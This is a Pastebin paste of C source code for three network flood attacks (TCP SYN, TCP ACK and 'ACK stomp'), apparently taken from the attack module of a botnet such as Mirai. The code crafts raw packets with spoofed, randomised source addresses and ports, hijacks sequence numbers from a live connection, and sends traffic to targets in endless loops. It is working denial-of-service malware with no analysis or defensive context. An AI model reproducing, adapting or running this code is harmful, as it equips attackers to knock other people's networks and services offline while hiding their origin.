API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 20th, 2018
61
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.77 KB | None | 0 0
raw download clone embed print report
  1. #define _GNU_SOURCE
  2.  
  3. #ifdef DEBUG
  4. #include <stdio.h>
  5. #endif
  6. #include <stdlib.h>
  7. #include <unistd.h>
  8. #include <sys/socket.h>
  9. #include <linux/ip.h>
  10. #include <linux/tcp.h>
  11. #include <fcntl.h>
  12. #include <errno.h>
  13. #include "includes.h"
  14. #include "attack.h"
  15. #include "checksum.h"
  16. #include "rand.h"
  17.  
  18. void attack_tcp_syn(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
  19. {
  20. int i, fd;
  21. char **pkts = calloc(targs_len, sizeof (char *));
  22. uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
  23. uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
  24. uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
  25. BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
  26. port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
  27. port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
  28. uint32_t seq = attack_get_opt_int(opts_len, opts, ATK_OPT_SEQRND, 0xffff);
  29. uint32_t ack = attack_get_opt_int(opts_len, opts, ATK_OPT_ACKRND, 0);
  30. BOOL urg_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_URG, FALSE);
  31. BOOL ack_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_ACK, FALSE);
  32. BOOL psh_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_PSH, FALSE);
  33. BOOL rst_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_RST, FALSE);
  34. BOOL syn_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_SYN, TRUE);
  35. BOOL fin_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_FIN, FALSE);
  36. uint32_t source_ip = attack_get_opt_ip(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
  37.  
  38. if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
  39. {
  40. #ifdef DEBUG
  41. printf("Failed to create raw socket. Aborting attack\n");
  42. #endif
  43. return;
  44. }
  45.  
  46. i = 1;
  47. if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
  48. {
  49. #ifdef DEBUG
  50. printf("Failed to set IP_HDRINCL. Aborting\n");
  51. #endif
  52. close(fd);
  53. return;
  54. }
  55.  
  56. for (i = 0; i < targs_len; i++)
  57. {
  58. struct iphdr *iph;
  59. struct tcphdr *tcph;
  60. uint8_t *opts;
  61.  
  62. pkts[i] = calloc(128, sizeof (char));
  63. iph = (struct iphdr *)pkts[i];
  64. tcph = (struct tcphdr *)(iph + 1);
  65. opts = (uint8_t *)(tcph + 1);
  66.  
  67. iph->version = 4;
  68. iph->ihl = 5;
  69. iph->tos = ip_tos;
  70. iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr) + 20);
  71. iph->id = htons(ip_ident);
  72. iph->ttl = ip_ttl;
  73. if (dont_frag)
  74. iph->frag_off = htons(1 << 14);
  75. iph->protocol = IPPROTO_TCP;
  76. iph->saddr = source_ip;
  77. iph->daddr = targs[i].addr;
  78.  
  79. tcph->source = htons(sport);
  80. tcph->dest = htons(dport);
  81. tcph->seq = htons(seq);
  82. tcph->doff = 10;
  83. tcph->urg = urg_fl;
  84. tcph->ack = ack_fl;
  85. tcph->psh = psh_fl;
  86. tcph->rst = rst_fl;
  87. tcph->syn = syn_fl;
  88. tcph->fin = fin_fl;
  89.  
  90. // TCP MSS
  91. *opts++ = PROTO_TCP_OPT_MSS; // Kind
  92. *opts++ = 4; // Length
  93. *((uint16_t *)opts) = htons(1400 + (rand_next() & 0x0f));
  94. opts += sizeof (uint16_t);
  95.  
  96. // TCP SACK permitted
  97. *opts++ = PROTO_TCP_OPT_SACK;
  98. *opts++ = 2;
  99.  
  100. // TCP timestamps
  101. *opts++ = PROTO_TCP_OPT_TSVAL;
  102. *opts++ = 10;
  103. *((uint32_t *)opts) = rand_next();
  104. opts += sizeof (uint32_t);
  105. *((uint32_t *)opts) = 0;
  106. opts += sizeof (uint32_t);
  107.  
  108. // TCP nop
  109. *opts++ = 1;
  110.  
  111. // TCP window scale
  112. *opts++ = PROTO_TCP_OPT_WSS;
  113. *opts++ = 3;
  114. *opts++ = 6; // 2^6 = 64, window size scale = 64
  115. }
  116.  
  117. while (TRUE)
  118. {
  119. for (i = 0; i < targs_len; i++)
  120. {
  121. char *pkt = pkts[i];
  122. struct iphdr *iph = (struct iphdr *)pkt;
  123. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
  124.  
  125. // For prefix attacks
  126. if (targs[i].netmask < 32)
  127. iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
  128.  
  129. if (source_ip == 0xffffffff)
  130. iph->saddr = rand_next();
  131. if (ip_ident == 0xffff)
  132. iph->id = rand_next() & 0xffff;
  133. if (sport == 0xffff)
  134. tcph->source = rand_next() & 0xffff;
  135. if (dport == 0xffff)
  136. tcph->dest = rand_next() & 0xffff;
  137. if (seq == 0xffff)
  138. tcph->seq = rand_next();
  139. if (ack == 0xffff)
  140. tcph->ack_seq = rand_next();
  141. if (urg_fl)
  142. tcph->urg_ptr = rand_next() & 0xffff;
  143.  
  144. iph->check = 0;
  145. iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
  146.  
  147. tcph->check = 0;
  148. tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr) + 20), sizeof (struct tcphdr) + 20);
  149.  
  150. targs[i].sock_addr.sin_port = tcph->dest;
  151. sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + 20, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
  152. }
  153. #ifdef DEBUG
  154. break;
  155. if (errno != 0)
  156. printf("errno = %d\n", errno);
  157. #endif
  158. }
  159. }
  160.  
  161. void attack_tcp_ack(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
  162. {
  163. int i, fd;
  164. char **pkts = calloc(targs_len, sizeof (char *));
  165. uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
  166. uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
  167. uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
  168. BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, FALSE);
  169. port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
  170. port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
  171. uint32_t seq = attack_get_opt_int(opts_len, opts, ATK_OPT_SEQRND, 0xffff);
  172. uint32_t ack = attack_get_opt_int(opts_len, opts, ATK_OPT_ACKRND, 0xffff);
  173. BOOL urg_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_URG, FALSE);
  174. BOOL ack_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_ACK, TRUE);
  175. BOOL psh_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_PSH, FALSE);
  176. BOOL rst_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_RST, FALSE);
  177. BOOL syn_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_SYN, FALSE);
  178. BOOL fin_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_FIN, FALSE);
  179. int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
  180. BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
  181. uint32_t source_ip = attack_get_opt_ip(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
  182.  
  183. if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
  184. {
  185. #ifdef DEBUG
  186. printf("Failed to create raw socket. Aborting attack\n");
  187. #endif
  188. return;
  189. }
  190. i = 1;
  191. if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
  192. {
  193. #ifdef DEBUG
  194. printf("Failed to set IP_HDRINCL. Aborting\n");
  195. #endif
  196. close(fd);
  197. return;
  198. }
  199.  
  200. for (i = 0; i < targs_len; i++)
  201. {
  202. struct iphdr *iph;
  203. struct tcphdr *tcph;
  204. char *payload;
  205.  
  206. pkts[i] = calloc(1510, sizeof (char));
  207. iph = (struct iphdr *)pkts[i];
  208. tcph = (struct tcphdr *)(iph + 1);
  209. payload = (char *)(tcph + 1);
  210.  
  211. iph->version = 4;
  212. iph->ihl = 5;
  213. iph->tos = ip_tos;
  214. iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
  215. iph->id = htons(ip_ident);
  216. iph->ttl = ip_ttl;
  217. if (dont_frag)
  218. iph->frag_off = htons(1 << 14);
  219. iph->protocol = IPPROTO_TCP;
  220. iph->saddr = source_ip;
  221. iph->daddr = targs[i].addr;
  222.  
  223. tcph->source = htons(sport);
  224. tcph->dest = htons(dport);
  225. tcph->seq = htons(seq);
  226. tcph->doff = 5;
  227. tcph->urg = urg_fl;
  228. tcph->ack = ack_fl;
  229. tcph->psh = psh_fl;
  230. tcph->rst = rst_fl;
  231. tcph->syn = syn_fl;
  232. tcph->fin = fin_fl;
  233. tcph->window = rand_next() & 0xffff;
  234. if (psh_fl)
  235. tcph->psh = TRUE;
  236.  
  237. rand_str(payload, data_len);
  238. }
  239.  
  240. // targs[0].sock_addr.sin_port = tcph->dest;
  241. // if (sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[0].sock_addr, sizeof (struct sockaddr_in)) < 1)
  242. // {
  243. //
  244. // }
  245.  
  246. while (TRUE)
  247. {
  248. for (i = 0; i < targs_len; i++)
  249. {
  250. char *pkt = pkts[i];
  251. struct iphdr *iph = (struct iphdr *)pkt;
  252. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
  253. char *data = (char *)(tcph + 1);
  254.  
  255. // For prefix attacks
  256. if (targs[i].netmask < 32)
  257. iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
  258.  
  259. if (source_ip == 0xffffffff)
  260. iph->saddr = rand_next();
  261. if (ip_ident == 0xffff)
  262. iph->id = rand_next() & 0xffff;
  263. if (sport == 0xffff)
  264. tcph->source = rand_next() & 0xffff;
  265. if (dport == 0xffff)
  266. tcph->dest = rand_next() & 0xffff;
  267. if (seq == 0xffff)
  268. tcph->seq = rand_next();
  269. if (ack == 0xffff)
  270. tcph->ack_seq = rand_next();
  271.  
  272. // Randomize packet content?
  273. if (data_rand)
  274. rand_str(data, data_len);
  275.  
  276. iph->check = 0;
  277. iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
  278.  
  279. tcph->check = 0;
  280. tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr) + data_len), sizeof (struct tcphdr) + data_len);
  281.  
  282. targs[i].sock_addr.sin_port = tcph->dest;
  283. sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
  284. }
  285. #ifdef DEBUG
  286. break;
  287. if (errno != 0)
  288. printf("errno = %d\n", errno);
  289. #endif
  290. }
  291. }
  292.  
  293. void attack_tcp_stomp(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
  294. {
  295. int i, rfd;
  296. struct attack_stomp_data *stomp_data = calloc(targs_len, sizeof (struct attack_stomp_data));
  297. char **pkts = calloc(targs_len, sizeof (char *));
  298. uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
  299. uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
  300. uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
  301. BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
  302. port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
  303. BOOL urg_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_URG, FALSE);
  304. BOOL ack_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_ACK, TRUE);
  305. BOOL psh_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_PSH, TRUE);
  306. BOOL rst_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_RST, FALSE);
  307. BOOL syn_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_SYN, FALSE);
  308. BOOL fin_fl = attack_get_opt_int(opts_len, opts, ATK_OPT_FIN, FALSE);
  309. int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 768);
  310. BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
  311.  
  312. // Set up receive socket
  313. if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
  314. {
  315. #ifdef DEBUG
  316. printf("Could not open raw socket!\n");
  317. #endif
  318. return;
  319. }
  320. i = 1;
  321. if (setsockopt(rfd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
  322. {
  323. #ifdef DEBUG
  324. printf("Failed to set IP_HDRINCL. Aborting\n");
  325. #endif
  326. close(rfd);
  327. return;
  328. }
  329.  
  330. // Retrieve all ACK/SEQ numbers
  331. for (i = 0; i < targs_len; i++)
  332. {
  333. int fd;
  334. struct sockaddr_in addr, recv_addr;
  335. socklen_t recv_addr_len;
  336. char pktbuf[256];
  337. time_t start_recv;
  338.  
  339. stomp_setup_nums:
  340.  
  341. if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  342. {
  343. #ifdef DEBUG
  344. printf("Failed to create socket!\n");
  345. #endif
  346. continue;
  347. }
  348.  
  349. // Set it in nonblocking mode
  350. fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK);
  351.  
  352. // Set up address to connect to
  353. addr.sin_family = AF_INET;
  354. if (targs[i].netmask < 32)
  355. addr.sin_addr.s_addr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
  356. else
  357. addr.sin_addr.s_addr = targs[i].addr;
  358. if (dport == 0xffff)
  359. addr.sin_port = rand_next() & 0xffff;
  360. else
  361. addr.sin_port = htons(dport);
  362.  
  363. // Actually connect, nonblocking
  364. connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
  365. start_recv = time(NULL);
  366.  
  367. // Get info
  368. while (TRUE)
  369. {
  370. int ret;
  371.  
  372. recv_addr_len = sizeof (struct sockaddr_in);
  373. ret = recvfrom(rfd, pktbuf, sizeof (pktbuf), MSG_NOSIGNAL, (struct sockaddr *)&recv_addr, &recv_addr_len);
  374. if (ret == -1)
  375. {
  376. #ifdef DEBUG
  377. printf("Could not listen on raw socket!\n");
  378. #endif
  379. return;
  380. }
  381. if (recv_addr.sin_addr.s_addr == addr.sin_addr.s_addr && ret > (sizeof (struct iphdr) + sizeof (struct tcphdr)))
  382. {
  383. struct tcphdr *tcph = (struct tcphdr *)(pktbuf + sizeof (struct iphdr));
  384.  
  385. if (tcph->source == addr.sin_port)
  386. {
  387. if (tcph->syn && tcph->ack)
  388. {
  389. struct iphdr *iph;
  390. struct tcphdr *tcph;
  391. char *payload;
  392.  
  393. stomp_data[i].addr = addr.sin_addr.s_addr;
  394. stomp_data[i].seq = ntohl(tcph->seq);
  395. stomp_data[i].ack_seq = ntohl(tcph->ack_seq);
  396. stomp_data[i].sport = tcph->dest;
  397. stomp_data[i].dport = addr.sin_port;
  398. #ifdef DEBUG
  399. printf("ACK Stomp got SYN+ACK!\n");
  400. #endif
  401. // Set up the packet
  402. pkts[i] = malloc(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
  403. iph = (struct iphdr *)pkts[i];
  404. tcph = (struct tcphdr *)(iph + 1);
  405. payload = (char *)(tcph + 1);
  406.  
  407. iph->version = 4;
  408. iph->ihl = 5;
  409. iph->tos = ip_tos;
  410. iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len);
  411. iph->id = htons(ip_ident);
  412. iph->ttl = ip_ttl;
  413. if (dont_frag)
  414. iph->frag_off = htons(1 << 14);
  415. iph->protocol = IPPROTO_TCP;
  416. iph->saddr = LOCAL_ADDR;
  417. iph->daddr = stomp_data[i].addr;
  418.  
  419. tcph->source = stomp_data[i].sport;
  420. tcph->dest = stomp_data[i].dport;
  421. tcph->seq = stomp_data[i].ack_seq;
  422. tcph->ack_seq = stomp_data[i].seq;
  423. tcph->doff = 8;
  424. tcph->fin = TRUE;
  425. tcph->ack = TRUE;
  426. tcph->window = rand_next() & 0xffff;
  427. tcph->urg = urg_fl;
  428. tcph->ack = ack_fl;
  429. tcph->psh = psh_fl;
  430. tcph->rst = rst_fl;
  431. tcph->syn = syn_fl;
  432. tcph->fin = fin_fl;
  433.  
  434. rand_str(payload, data_len);
  435. break;
  436. }
  437. else if (tcph->fin || tcph->rst)
  438. {
  439. close(fd);
  440. goto stomp_setup_nums;
  441. }
  442. }
  443. }
  444.  
  445. if (time(NULL) - start_recv > 10)
  446. {
  447. #ifdef DEBUG
  448. printf("Couldn't connect to host for ACK Stomp in time. Retrying\n");
  449. #endif
  450. close(fd);
  451. goto stomp_setup_nums;
  452. }
  453. }
  454. }
  455.  
  456. // Start spewing out traffic
  457. while (TRUE)
  458. {
  459. for (i = 0; i < targs_len; i++)
  460. {
  461. char *pkt = pkts[i];
  462. struct iphdr *iph = (struct iphdr *)pkt;
  463. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
  464. char *data = (char *)(tcph + 1);
  465.  
  466. if (ip_ident == 0xffff)
  467. iph->id = rand_next() & 0xffff;
  468.  
  469. if (data_rand)
  470. rand_str(data, data_len);
  471.  
  472. iph->check = 0;
  473. iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
  474.  
  475. tcph->seq = htons(stomp_data[i].seq++);
  476. tcph->ack_seq = htons(stomp_data[i].ack_seq);
  477. tcph->check = 0;
  478. tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr) + data_len), sizeof (struct tcphdr) + data_len);
  479.  
  480. targs[i].sock_addr.sin_port = tcph->dest;
  481. sendto(rfd, pkt, sizeof (struct iphdr) + sizeof (struct tcphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
  482. }
  483. #ifdef DEBUG
  484. break;
  485. if (errno != 0)
  486. printf("errno = %d\n", errno);
  487. #endif
  488. }
  489. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!